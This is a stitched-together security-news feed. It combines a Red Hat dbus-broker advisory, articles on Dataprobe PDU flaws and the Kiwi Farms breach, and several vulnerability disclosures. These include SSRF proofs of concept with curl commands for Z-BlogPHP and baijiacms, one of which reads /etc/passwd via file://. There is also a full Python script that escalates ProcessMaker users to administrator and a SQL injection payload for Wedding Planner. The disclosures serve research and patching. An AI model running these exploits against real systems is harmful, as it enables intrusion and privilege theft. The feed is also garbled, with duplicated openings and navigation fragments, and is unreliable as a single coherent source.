Red Hat Security Advisory 2022-6608-01 - dbus-broker is an implementation of a message bus as defined by the D-Bus specification. Its aim is to provide high performance and reliability, while keeping compatibility to the D-Bus reference implementation. It is exclusively written for Linux systems, and makes use of many modern features provided by recent Linux kernel releases. Issues addressed include buffer over-read and null pointer vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: dbus-broker security update  
Advisory ID:       RHSA-2022:6608-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6608  
Issue date:        2022-09-20  
CVE Names:         CVE-2022-31212 CVE-2022-31213   
=====================================================================

1. Summary:

An update for dbus-broker is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

dbus-broker is an implementation of a message bus as defined by the D-Bus  
specification. Its aim is to provide high performance and reliability,  
while keeping compatibility to the D-Bus reference implementation. It is  
exclusively written for Linux systems, and makes use of many modern  
features provided by recent Linux kernel releases.

Security Fix(es):

* dbus-broker: a stack buffer over-read if a malicious Exec line is  
supplied (CVE-2022-31212)

* dbus-broker: null pointer reference when supplying a malformed XML config  
file (CVE-2022-31213)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2094718 - CVE-2022-31212 dbus-broker: a stack buffer over-read if a malicious Exec line is supplied  
2094722 - CVE-2022-31213 dbus-broker: null pointer reference when supplying a malformed XML config file

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
dbus-broker-28-5.1.el9_0.src.rpm

aarch64:  
dbus-broker-28-5.1.el9_0.aarch64.rpm  
dbus-broker-debuginfo-28-5.1.el9_0.aarch64.rpm  
dbus-broker-debugsource-28-5.1.el9_0.aarch64.rpm

ppc64le:  
dbus-broker-28-5.1.el9_0.ppc64le.rpm  
dbus-broker-debuginfo-28-5.1.el9_0.ppc64le.rpm  
dbus-broker-debugsource-28-5.1.el9_0.ppc64le.rpm

s390x:  
dbus-broker-28-5.1.el9_0.s390x.rpm  
dbus-broker-debuginfo-28-5.1.el9_0.s390x.rpm  
dbus-broker-debugsource-28-5.1.el9_0.s390x.rpm

x86_64:  
dbus-broker-28-5.1.el9_0.x86_64.rpm  
dbus-broker-debuginfo-28-5.1.el9_0.x86_64.rpm  
dbus-broker-debugsource-28-5.1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-31212  
https://access.redhat.com/security/cve/CVE-2022-31213  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYypfkdzjgjWX9erEAQiYfQ//fRtjolqDZyqH7L9xztUuHaw3lSHLNA8h  
l6S0hdRm00n3LXLV4b5nUP4w658nabDNZnpHpbEPhJ+zmIpYsuxgU31ZdqaxDt0N  
VxKwJVZhr9Cl/Rwq0kTsfTNxa0eh1xM4UMpGp5VRG1Heybh+/OoIy2b8U92zKXy7  
tkiiMFe+XHc6GvWYLcV5ZssTkWRPqq9BIFkbC/pv4H0ZfEZLEPtBROTiDdXYeWv0  
232PgOdXhxC/chXMLKZ1hrxerF317fTv6F+oVDXCrCHoTi+1KcIxAejieffnlQHE  
IdmjRWKPs51JpA7byflFsn6vZH623vqm15/cRz3jJs3EWZVoaPJL/s84siiNt+Pu  
Oy7FiyUN00NUDRzrNmo/JBGrqvjDjZAU/KyxaKBCPzttSpDVD5QK57khge6giCjM  
+5cXKXSuuMah7fuIcx08vdr4BGlXmO3J7r2q72LeiU7JFws3KSawj8c1G/YgxxU/  
J4NXuKStijmLrkyuP7XwPe3okV6LFJhArAUY8yVGZfcuD8gwWvl/15hpYmB5R1VW  
WG9S9JRPK3hDCIOw3w3i3wbLh5yBSoQJTXl57QO4+5CVhBHxKnPzjWDY8Xg9MdDr  
2a/s907lzbO1WQLl00mxBkngHcT7vRGPammpSyfY68Sg1vkJzLM3DceHZoTF1JP7  
7NxUgIwhSCk=  
=clNW  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6608-01

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday released an industrial control systems (ICS) advisory warning of seven security flaws in Dataprobe's iBoot-PDU power distribution unit product, mostly used in industrial environments and data centers.
"Successful exploitation of these vulnerabilities could lead to unauthenticated remote code execution on the Dataprobe

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday released an industrial control systems (ICS) advisory warning of seven security flaws in Dataprobe's iBoot-PDU power distribution unit product, mostly used in industrial environments and data centers.

"Successful exploitation of these vulnerabilities could lead to unauthenticated remote code execution on the Dataprobe iBoot-PDU device," the agency said in a notice.

Credited with disclosing the flaws is industrial cybersecurity firm Claroty, which said the weaknesses could be remotely triggered "either through a direct web connection to the device or via the cloud."

iBoot-PDU is a power distribution unit (PDU) that provides users with real-time monitoring capabilities and sophisticated alerting mechanisms via a web interface so as to control the power supply to devices and other equipment in an OT environment.

The vulnerabilities assume new significance when taking into consideration the fact that no fewer than 2,600 PDUs are accessible on the internet, with Dataprobe devices accounting for nearly a third of those exposed, according to a 2021 report from attack surface management platform Censys.

Claroty's analysis of the PDU firmware shows that the product is crippled by issues ranging from command injection to path traversal flaws, exposing customers to severe security risks -

*   CVE-2022-3183 (CVSS score: 9.8) - A command injection vulnerability stemming from a lack of sanitization of user input
*   CVE-2022-3184 (CVSS score: 9.8) - A path traversal vulnerability that enables access to an unauthenticated PHP page, which could be abused to insert malicious code

Successful remote exploitation of the flaws "puts an attacker within arm's length of disrupting critical services by cutting off electric power to the device and subsequently, anything plugged into it," Clarory researcher Uri Katz said.

The other five uncovered vulnerabilities (from CVE-2022-3185 through CVE-2022-3189) could be weaponized by a bad actor to access the device's main management page from the cloud and even trick the server to connect to arbitrary internal or external systems (aka SSRF), potentially leaking sensitive information.

"Even an innocuous power distribution unit remotely managed over the internet or via a cloud-based management platform can provide a determined attacker to target the network, or with a way to disrupt essential services by cutting power to devices plugged into a PDU," Katz said.

Claroty further disclosed that it found a way to enumerate cloud-connected iBoot PDU devices by exploiting a combination of a valid cookie and the device ID (a sequential numeric value that can be trivially guessed), thereby widening the available attack surface to all connected devices.

Users of Dataprobe iBoot-PDU are recommended to upgrade to the latest firmware version (1.42.06162022) as well as disable SNMP, Telnet, and HTTP, if not in use, as a mitigation against some of these vulnerabilities.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Critical Remote Hack Flaws Found in Dataprobe's Power Distribution Units

A security issue was discovered in Z-BlogPHP <= 1.7.2. A Server-Side Request Forgery (SSRF) vulnerability in the zb_users/plugin/UEditor/php/action_crawler.php file allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the source parameter.

A Server-Side Request Forgery (SSRF) in action\_crawler.php file of Z-BlogPHP allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the source parameter.

Test Environment: Ubuntu and PHP 7.2  
Impact version: Z-BlogPHP <= 1.7.2

// zb\_users/plugin/UEditor/php/controller.php
$action = $\_GET\['action'\];

switch ($action) {
    case 'config':
        $result = json\_encode($CONFIG);
        break;

    /\* 上传图片 \*/
    case 'uploadimage':
    /\* 上传涂鸦 \*/
    case 'uploadscrawl':
    /\* 上传视频 \*/
    case 'uploadvideo':
    /\* 上传文件 \*/
    case 'uploadfile':
        $result = include "action\_upload.php";
        break;

    /\* 抓取远程文件 \*/
    case 'catchimage':
        $result = include "action\_crawler.php";
        break;

    default:
        $result = json\_encode(array(
            'state' => '请求地址出错',
        ));
        break;
}

//zb\_users/plugin/UEditor/php/action\_crawler.php

foreach ($source as $imgUrl) {
    $item = new Uploader($imgUrl, $config, "remote");
    $info = $item\->getFileInfo();
    array\_push($list, array(
        "state"    => $info\["state"\],
        "url"      => $info\["url"\],
        "size"     => $info\["size"\],
        "title"    => htmlspecialchars($info\["title"\]),
        "original" => htmlspecialchars($info\["original"\]),
        "source"   => htmlspecialchars($imgUrl),
    ));
}

// zb\_users/plugin/UEditor/php/Uploader.class.php

public function \_\_construct($fileField, $config, $type = "upload")
{
    global $zbp;
    $this\->stateMap\['ERROR\_TYPE\_NOT\_ALLOWED'\] = $zbp\->lang\['error'\]\['26'\];
    $this\->stateMap\['ERROR\_SIZE\_EXCEED'\] = $zbp\->lang\['error'\]\['27'\];
    $this\->stateMap\['ERROR\_UNKNOWN'\] = $zbp\->lang\['error'\]\['0'\];
    $this\->fileField = $fileField;
    $this\->config = $config;
    $this\->type = $type;
    if ($type == "remote") {
        $this\->saveRemote();
    }
    ...
    
    ...

private function saveRemote()
{
    global $zbp;
    $imgUrl = htmlspecialchars($this\->fileField);
    $imgUrl = str\_replace("&amp;", "&", $imgUrl);

    //http开头验证
    if (strpos($imgUrl, "http") !== 0) {
        $this\->stateInfo = $this\->getStateInfo("ERROR\_HTTP\_LINK");

        return;
    }
    //获取请求头并检测死链
    $heads = get\_headers($imgUrl, 1);
    ...

Because the source parameter is unrestricted, it is also possible to use the server side to send requests, such as probing intranet web services. The corresponding PoC is as follows

    GET /zblog/zb_users/plugin/UEditor/php/controller.php?action=catchimage&source[1]=http://172.16.119.1/zfuzz HTTP/1.1
    Host: 172.16.119.145
    Cookie: timezone=8; username=admin; token=eec828fbf6857c2620e0bcd3d128a142e225dbaaac76572657c30d36b0df0a861665059400; addinfozblog=%7B%22chkadmin%22%3A1%2C%22chkarticle%22%3A1%2C%22levelname%22%3A%22%5Cu7ba1%5Cu7406%5Cu5458%22%2C%22userid%22%3A%221%22%2C%22useralias%22%3A%22admin%22%7D
    Connection: close
    

You can also use the following curl command to verify the vulnerability

    curl -i -s -k -X $'GET' \
        -H $'Host: 172.16.119.145' -H $'Connection: close' \
        -b $'timezone=8; username=admin; token=eec828fbf6857c2620e0bcd3d128a142e225dbaaac76572657c30d36b0df0a861665059400; addinfozblog=%7B%22chkadmin%22%3A1%2C%22chkarticle%22%3A1%2C%22levelname%22%3A%22%5Cu7ba1%5Cu7406%5Cu5458%22%2C%22userid%22%3A%221%22%2C%22useralias%22%3A%22admin%22%7D' \
        $'http://172.16.119.145/zblog/zb_users/plugin/UEditor/php/controller.php?action=catchimage&source[1]=http://172.16.119.1/zfuzz'

CVE-2022-40357: [Vuln] SSRF vulnerability in saveRemote Function · Issue #336 · zblogcn/zblogphp

A Server-Side Request Forgery (SSRF) in fetch_net_file_upload function of baijiacmsV4 v4.1.4 allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the url parameter.

**SSRF vulnerability in fetch_net_file_upload Function of file.php File (baijiacms v4.1.4 version)****0x01 Affected version**

vendor: https://baijiacms.github.io/baijiacmsv4/index.html

version: V4.1.4

php version: 7.x

**0x02 Vulnerability description**

A Server-Side Request Forgery (SSRF) in fetch_net_file_upload function of baijiacmsv4 allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the url parameter. We should note that the vulnerability requires authentication before it can be triggered.

The vulnerable code is located in the fetch_net_file_upload function in the includes/baijiacms/common.inc.php file. This function is called in the file system/public/class/web/file.php. Because the function does not perform sufficient checksumming on the url parameter, the taint is introduced from the $url variable into the tainted function file_get_contents, and after the file_get_contents function is executed it sends a request to the URL specified by the url parameter, eventually leading to an SSRF vulnerability.

The file system/public/class/web/file.php calls the fetch_net_file_upload function with the following code

if ($do == 'fetch') {
    $url = trim($\_GPC\['url'\]); // $\_GPC actually is $\_GET 
    $file = fetch\_net\_file\_upload($url);
    if (is\_error($file)) {
        $result\['message'\] = $file\['message'\];
        die(json\_encode($result));
    }
}

The relevant code for the file includes/baijiacms/common.inc.php is shown below

function fetch\_net\_file\_upload($url)
{
    $url = trim($url);
    $extention = pathinfo($url, PATHINFO\_EXTENSION);
    $path = '/attachment/';
    $extpath = "{$extention}/" . date('Y/m/');

    mkdirs(WEB\_ROOT . $path . $extpath);
    do {
        $filename = random(15) . ".{$extention}";
    } while (is\_file(SYSTEM\_WEBROOT . $path . $extpath . $filename));


    $file\_tmp\_name = SYSTEM\_WEBROOT . $path . $extpath . $filename;
    $file\_relative\_path = $extpath . $filename;
    if (file\_put\_contents($file\_tmp\_name, file\_get\_contents($url)) == false) {
        $result\['message'\] = '提取失败.';
        return $result;
    }
    $file\_full\_path = WEB\_ROOT . $path . $extpath . $filename;
    return file\_save($file\_tmp\_name, $filename, $extention, $file\_full\_path, $file\_relative\_path);
}

Because the url parameter is unrestricted, it is also possible to use the server side to send requests, such as probing intranet web services. The corresponding PoC is as follows

    GET /index.php?mod=site&do=file&act=public&op=fetch&beid=1&url=http%3A%2F%2F172.16.119.1%2Fzfuzz HTTP/1.1
    Host: 172.16.119.141
    Accept: application/json, text/javascript, */*; q=0.01
    Cookie: PHPSESSID=e7m370238fh577ta0kbqmkr7e1; __fileupload_type=image; __fileupload_dest_dir=; __fileupload_global=
    Connection: close
    

You can also use the following curl command to verify the vulnerability

    curl -i -s -k -X $'GET' \
        -H $'Host: 172.16.119.141' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Connection: close' \
        -b $'PHPSESSID=e7m370238fh577ta0kbqmkr7e1; __fileupload_type=image; __fileupload_dest_dir=; __fileupload_global=' \
        $'http://172.16.119.141/index.php?mod=site&do=file&act=public&op=fetch&beid=1&url=http%3A%2F%2F172.16.119.1%2Fzfuzz'
    

The vulnerability can also be exploited to read arbitrary local files using the file:// protocol, as the vulnerability saves the fetched content under the attachment folder and returns the corresponding file name. So we can directly access the corresponding file to get the file content.

Access the corresponding file to get the contents of the /etc/passwd file

**0x03 Acknowledgement**

Ez Wang, Yf Gao, Zh Wang, Lj Wu, W Xie

CVE-2022-38931: CVE_Request/baijiacmsv4_ssrf.md at master · zer0yu/CVE_Request

TestLink v1.9.20 was discovered to contain a Cross-Site Request Forgery (CSRF) via /lib/plan/planView.php.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Changelog
    
*   *   By Plan
    *   Enterprise
    *   Teams
    *   Compare all
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

CVE-2022-35196: CVEs/TestLink/CVE-2022-35196 at main · HuangYuHsiangPhone/CVEs

Categories: News
Tags: Kiwifarms

Tags:  breach

Tags:  compromise

Tags:  exposure

Tags:  forum

Tags:  forums

Kiwi Farms, which gained a reputation for sophisticated trolling and doxxing, has experienced a potentially severe data breach.



(Read more...)




The post Kiwi Farms breached, user data potentially exposed appeared first on Malwarebytes Labs.

The operators of a site known to most observers for being in a recent state of flux have announced a forum breach. Kiwi Farms, which gained a reputation for sophisticated trolling and doxxing, was recently dropped by Cloudflare after a sustained campaign to have the DDoS mitigation and cloud hosting service abandon the forum.

The site has since returned, but with a major problem: a breach which potentially reveals a large amount of user data.

**The breach revealed**

The site creator had the following to say in relation to the compromise:

_The forum was hacked. You should assume the following._

_Assume your password for the Kiwi Farms has been stolen._

_Assume your email has been leaked._

_Assume any IP you've used on your Kiwi Farms account in the last month has been leaked._

The attack made use of the synergy between the main forum site and a second site, XenForo. The latter is a commercial internet forum software package written in PHP. Attackers created a webpage disguised as an audio file to XenForo, loading this page elsewhere in a manner which caused user authentication cookies to be sent off-site. The main admin account for the forum was apparently hijacked in this same fashion.

**The fallout from a forum compromise**

We often warn about using forums without implementing the proper failsafes and protection, and a breach such as this hammers home the point. A lot of users on the site may now have a lot of information exposed that they’d really rather not. Similarly, curious observers or even unwary researchers or law enforcement may have registered and not considered the possibility of a data leak.

This data could end up anywhere, and there’s no surefire way to know what’s been taken. It could end up on other forums, data dumps, or in the hands of law enforcement agencies. No matter what site you’re registered on, you should consider:

*   Use different passwords for all sites. Once those data dumps go public, cybercriminals will try logging in to other accounts using the same email and username combinations.
    
*   Consider using a VPN, TOR, or some other method to obscure your IP address. Some forums insist on people using their real IP address when registering and posting to a forum, and may even ban or block VPNS, proxies, and other services.
    
*   Be careful what you reveal to other site users via direct messages. People tend to not delete these messages, and sites don’t always auto-prune older messages. It’s also possible sites may store data sent and received, and not even tell you.
    

It remains to be seen what happens to Kiwi Farms, and the site owner is looking to migrate away from aspects of the site which led to this compromise. For now, it’s a timely reminder to keep on top of potential system vulnerabilities and also consider what data you may be leaving on a site for others to collect at the worst possible moment.

Kiwi Farms breached, user data potentially exposed

ProcessMaker versions prior to 3.5.4 were discovered to be susceptible to a remote privilege escalation vulnerability.

    # Exploit Title: ProcessMaker - User Profile Privilege Escalation# Description: ProcessMaker before v3.5.4 was discovered to contain insecure permissions in the user profile page. This vulnerability allows attackers to escalate normal users to Administrators. # Date: 20220822# Exploit Author: Sornram Kampeera (Sornram9254)# Vendor Homepage: https://www.processmaker.com# Software Link: https://sourceforge.net/projects/processmaker/files/ProcessMaker/# Version: ProcessMaker before v3.5.4 (Already Tested on 2.5.0, 2.5.2, 3.0 GA and 3.2.1)# Tested on: Windows 11, Debian 11 (WSL2)# CVE : CVE-2022-38577"""Privilege Escalation replication.for 2.5.0 - 3.0 GA:    1. Log in as normal user.    2. Change "USR_ROLE" on post request form when updating profile information to "PROCESSMAKER_ADMIN".    3. Refresh page to get new role.for 3.2.1 and before:    1. Log in as normal user.    2. Get Role ID by request "/sysworkflow/en/neoclassic/roles/roles_Ajax?request=rolesList&_dc={epoch_time}"    3. Get Permission ID by request "/sysworkflow/en/neoclassic/roles/data_rolesPermissions?rUID={Role_ID}&type=show"    4. Update role to escalation privileges using POST Body request:    POST /sysworkflow/en/neoclassic/roles/roles_Ajax    request=assignPermissionToRoleMultiple&ROL_UID={Role_ID}&PER_UID={PERMISSION_ID}"""#!/usr/bin/python# TODO: Optimize code [requests module], and Exception Handling.# Replace the variables USERNAME, PASSWORD, and APP_URL.import requests, json, re, argparse, sysUSER_AGENT = 'Mozilla/5.0'APP_URL = "http://localhost:9994"USERNAME = '__USER__'PASSWORD = '__PASS__'parser = argparse.ArgumentParser()parser.add_argument("action", type=str, help="Add or Delete role permission.", nargs="?", default=".")parser.add_argument("-a", "--add",      action="store_true",    help="Add role permission")parser.add_argument("-d", "--delete",   action="store_true",    help="Delete role permission")parser.add_argument("-l", "--list",     action="store_true",    help="List all roles")args = parser.parse_args()if args.add:    action = "assign"elif args.delete:    action = "delete"elif args.list:    action = "list"    print("All Permission UID")    print("View more: https://wiki.processmaker.com/3.3/Roles")    PERM_LIST = """PER_UID: 00000000000000000000000000000001, PER_CODE: PM_LOGINPER_UID: 00000000000000000000000000000002, PER_CODE: PM_SETUPPER_UID: 00000000000000000000000000000003, PER_CODE: PM_USERSPER_UID: 00000000000000000000000000000004, PER_CODE: PM_FACTORYPER_UID: 00000000000000000000000000000005, PER_CODE: PM_CASESPER_UID: 00000000000000000000000000000006, PER_CODE: PM_ALLCASESPER_UID: 00000000000000000000000000000007, PER_CODE: PM_REASSIGNCASEPER_UID: 00000000000000000000000000000008, PER_CODE: PM_REPORTSPER_UID: 00000000000000000000000000000009, PER_CODE: PM_SUPERVISORPER_UID: 00000000000000000000000000000010, PER_CODE: PM_SETUP_ADVANCEPER_UID: 00000000000000000000000000000011, PER_CODE: PM_DASHBOARDPER_UID: 00000000000000000000000000000012, PER_CODE: PM_WEBDAVPER_UID: 00000000000000000000000000000013, PER_CODE: PM_DELETECASEPER_UID: 00000000000000000000000000000014, PER_CODE: PM_EDITPERSONALINFOPER_UID: 00000000000000000000000000000015, PER_CODE: PM_FOLDERS_VIEWPER_UID: 00000000000000000000000000000016, PER_CODE: PM_FOLDERS_ADD_FOLDERPER_UID: 00000000000000000000000000000017, PER_CODE: PM_FOLDERS_ADD_FILEPER_UID: 00000000000000000000000000000018, PER_CODE: PM_CANCELCASEPER_UID: 00000000000000000000000000000019, PER_CODE: PM_FOLDER_DELETEPER_UID: 00000000000000000000000000000020, PER_CODE: PM_SETUP_LOGOPER_UID: 00000000000000000000000000000021, PER_CODE: PM_SETUP_EMAILPER_UID: 00000000000000000000000000000022, PER_CODE: PM_SETUP_CALENDARPER_UID: 00000000000000000000000000000023, PER_CODE: PM_SETUP_PROCESS_CATEGORIESPER_UID: 00000000000000000000000000000024, PER_CODE: PM_SETUP_CLEAR_CACHEPER_UID: 00000000000000000000000000000025, PER_CODE: PM_SETUP_HEART_BEATPER_UID: 00000000000000000000000000000026, PER_CODE: PM_SETUP_ENVIRONMENTPER_UID: 00000000000000000000000000000027, PER_CODE: PM_SETUP_PM_TABLESPER_UID: 00000000000000000000000000000028, PER_CODE: PM_SETUP_LOGINPER_UID: 00000000000000000000000000000029, PER_CODE: PM_SETUP_DASHBOARDSPER_UID: 00000000000000000000000000000030, PER_CODE: PM_SETUP_LANGUAGEPER_UID: 00000000000000000000000000000031, PER_CODE: PM_SETUP_SKINPER_UID: 00000000000000000000000000000032, PER_CODE: PM_SETUP_CASES_LIST_CACHE_BUILDERPER_UID: 00000000000000000000000000000033, PER_CODE: PM_SETUP_PLUGINSPER_UID: 00000000000000000000000000000034, PER_CODE: PM_SETUP_USERS_AUTHENTICATION_SOURCESPER_UID: 00000000000000000000000000000035, PER_CODE: PM_SETUP_LOGSPER_UID: 00000000000000000000000000000036, PER_CODE: PM_DELETE_PROCESS_CASESPER_UID: 00000000000000000000000000000037, PER_CODE: PM_EDITPERSONALINFO_CALENDARPER_UID: 00000000000000000000000000000038, PER_CODE: PM_UNCANCELCASEPER_UID: 00000000000000000000000000000039, PER_CODE: PM_REST_API_APPLICATIONSPER_UID: 00000000000000000000000000000040, PER_CODE: PM_EDIT_USER_PROFILE_FIRST_NAMEPER_UID: 00000000000000000000000000000041, PER_CODE: PM_EDIT_USER_PROFILE_LAST_NAMEPER_UID: 00000000000000000000000000000042, PER_CODE: PM_EDIT_USER_PROFILE_USERNAMEPER_UID: 00000000000000000000000000000043, PER_CODE: PM_EDIT_USER_PROFILE_EMAILPER_UID: 00000000000000000000000000000044, PER_CODE: PM_EDIT_USER_PROFILE_ADDRESSPER_UID: 00000000000000000000000000000045, PER_CODE: PM_EDIT_USER_PROFILE_ZIP_CODEPER_UID: 00000000000000000000000000000046, PER_CODE: PM_EDIT_USER_PROFILE_COUNTRYPER_UID: 00000000000000000000000000000047, PER_CODE: PM_EDIT_USER_PROFILE_STATE_OR_REGIONPER_UID: 00000000000000000000000000000048, PER_CODE: PM_EDIT_USER_PROFILE_LOCATIONPER_UID: 00000000000000000000000000000049, PER_CODE: PM_EDIT_USER_PROFILE_PHONEPER_UID: 00000000000000000000000000000050, PER_CODE: PM_EDIT_USER_PROFILE_POSITIONPER_UID: 00000000000000000000000000000051, PER_CODE: PM_EDIT_USER_PROFILE_REPLACED_BYPER_UID: 00000000000000000000000000000052, PER_CODE: PM_EDIT_USER_PROFILE_EXPIRATION_DATEPER_UID: 00000000000000000000000000000053, PER_CODE: PM_EDIT_USER_PROFILE_CALENDARPER_UID: 00000000000000000000000000000054, PER_CODE: PM_EDIT_USER_PROFILE_STATUSPER_UID: 00000000000000000000000000000055, PER_CODE: PM_EDIT_USER_PROFILE_ROLEPER_UID: 00000000000000000000000000000056, PER_CODE: PM_EDIT_USER_PROFILE_TIME_ZONEPER_UID: 00000000000000000000000000000057, PER_CODE: PM_EDIT_USER_PROFILE_DEFAULT_LANGUAGEPER_UID: 00000000000000000000000000000058, PER_CODE: PM_EDIT_USER_PROFILE_COSTSPER_UID: 00000000000000000000000000000059, PER_CODE: PM_EDIT_USER_PROFILE_PASSWORDPER_UID: 00000000000000000000000000000060, PER_CODE: PM_EDIT_USER_PROFILE_USER_MUST_CHANGE_PASSWORD_AT_NEXT_LOGONPER_UID: 00000000000000000000000000000061, PER_CODE: PM_EDIT_USER_PROFILE_PHOTOPER_UID: 00000000000000000000000000000062, PER_CODE: PM_EDIT_USER_PROFILE_DEFAULT_MAIN_MENU_OPTIONSPER_UID: 00000000000000000000000000000063, PER_CODE: PM_EDIT_USER_PROFILE_DEFAULT_CASES_MENU_OPTIONSPER_UID: 00000000000000000000000000000064, PER_CODE: PM_REASSIGNCASE_SUPERVISOR"""    print(PERM_LIST)    sys.exit()else:    print("Example Permission UID")    SAMPLE_PERM_LIST = """>>> PER_UID: 00000000000000000000000000000002, PER_CODE: PM_SETUP>>> PER_UID: 00000000000000000000000000000010, PER_CODE: PM_SETUP_ADVANCE>>> PER_UID: 00000000000000000000000000000033, PER_CODE: PM_SETUP_PLUGINSpython Processmaker-PoC.py --helppython Processmaker-PoC.py --listpython Processmaker-PoC.py --add 00000000000000000000000000000002python Processmaker-PoC.py --delete 00000000000000000000000000000002"""    print(SAMPLE_PERM_LIST)    sys.exit()PERMISSION_UID = args.actionloginData = "__notValidateThisFields__=[{'name':'USR_USERNAME','type':'text','label':'User','validate':'Any','required':'0'}]&"loginData += "DynaformRequiredFields=[{'name':'USR_USERNAME','type':'text','label':'User','validate':'Any','required':'0'}]&"loginData += "__DynaformName__=sysLogin&"loginData += "form[BROWSER_TIME_ZONE_OFFSET]=25200&"loginData += "form[USR_PASSWORD]=" + PASSWORD + "&"loginData += "form[USR_USERNAME]=" + USERNAME + "&"loginData += "form[USR_PASSWORD_MASK]=&"loginData += "form[USER_ENV]=workflow&"loginData += "form[USER_LANG]=en"def getResponse(rMethod, rHeaders, rUrl,rData=None):    SSL_VERIFY = False    if rMethod == 'GET':        response = requests.get(rUrl, headers=rHeaders, verify=SSL_VERIFY, allow_redirects=True)    elif rMethod == "POST":        response = requests.post(rUrl, data=rData, headers=rHeaders, verify=SSL_VERIFY, allow_redirects=True)    else:        print("Please choose correct answer")    return responsegetCookie = getResponse('POST',                        {'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': USER_AGENT, 'Connection': 'close'},                        APP_URL + '/sys/en/neoclassic/login/sysLogin',                        loginData).cookies['PHPSESSID']if getCookie is not None:    getUserID = getResponse( 'GET',                                {'User-Agent': USER_AGENT, 'Accept': '*', 'Cookie': 'PHPSESSID=' + getCookie, 'Connection': 'close'},                                APP_URL + '/sysworkflow/en/neoclassic/users/usersInit')    USER_ID = re.findall(r"USR_UID\s=\s\"(\w{32})\"", getUserID.text, re.MULTILINE)[0]    getRolesName = getResponse('POST',                                {'User-Agent': USER_AGENT, 'Accept': '*', 'Cookie': 'PHPSESSID=' + getCookie,'Content-Type' : 'application/x-www-form-urlencoded', 'Connection': 'close'},                                APP_URL + '/sysworkflow/en/neoclassic/users/usersAjax',                                'action=userData&USR_UID=' + USER_ID)                                    getRolesList = getResponse( 'GET',                                {'User-Agent': USER_AGENT, 'Accept': '*', 'Cookie': 'PHPSESSID=' + getCookie, 'Connection': 'close'},                                APP_URL + '/sysworkflow/en/neoclassic/roles/roles_Ajax?request=rolesList&_dc=')    getRolesPermission = getResponse('POST',                                {'User-Agent': USER_AGENT, 'Accept': '*', 'Cookie': 'PHPSESSID=' + getCookie, 'Connection': 'close'},                                APP_URL + '/sysworkflow/en/neoclassic/roles/data_rolesPermissions?rUID=ROLE_UID&type=show')    roleUID = re.findall(r"\"ROL_UID\":\"(\w{32})\",\"ROL_PARENT\":\"\",\"ROL_SYSTEM\":\"\w{32}\",\"SYS_CODE\":\"PROCESSMAKER\",\"ROL_CODE\":\"" + json.loads(getRolesName.text)['user']['USR_ROLE'] + "\"", getRolesList.text, re.MULTILINE)[0]def actionRoleResponse():    actionRoleStatus = getResponse('POST',                                {'User-Agent': USER_AGENT,'Content-Type': 'application/x-www-form-urlencoded','Cookie': 'PHPSESSID=' + getCookie,'Connection': 'close'},                                APP_URL + '/sysworkflow/en/neoclassic/roles/roles_Ajax',                                'request=' + action + 'PermissionToRoleMultiple&ROL_UID=' + roleUID + '&PER_UID=' + PERMISSION_UID)    return actionRoleStatus.status_codeif actionRoleResponse() == 200:    print(action.capitalize() + " role successfully.")elif actionRoleResponse() == 503:    print("Role already exists.")else:    print("Error!")

ProcessMaker Privilege Escalation

Wedding Planner v1.0 was discovered to contain a SQL injection vulnerability via the booking_id parameter at /admin/budget.php.

Permalink

Cannot retrieve contributors at this time

**Wedding Planner v1.0 by pushpam02 has SQL injection**

BUG\_Author: Ptanly

vendor: https://www.sourcecodester.com/php/15375/wedding-planner-project-php-free-download.html

Vulnerability File: /Wedding-Management-PHP/admin/budget.php?booking\_id=

Vulnerability url: http://ip/Wedding-Management-PHP/admin/budget.php?booking\_id=

\[+\] Payload: /Wedding-Management-PHP/admin/budget.php?booking\_id=31%20and%20length(database())%20=9&user\_id=31 // Leak place ---> booking\_id

dbname = dbwedding,length is 9

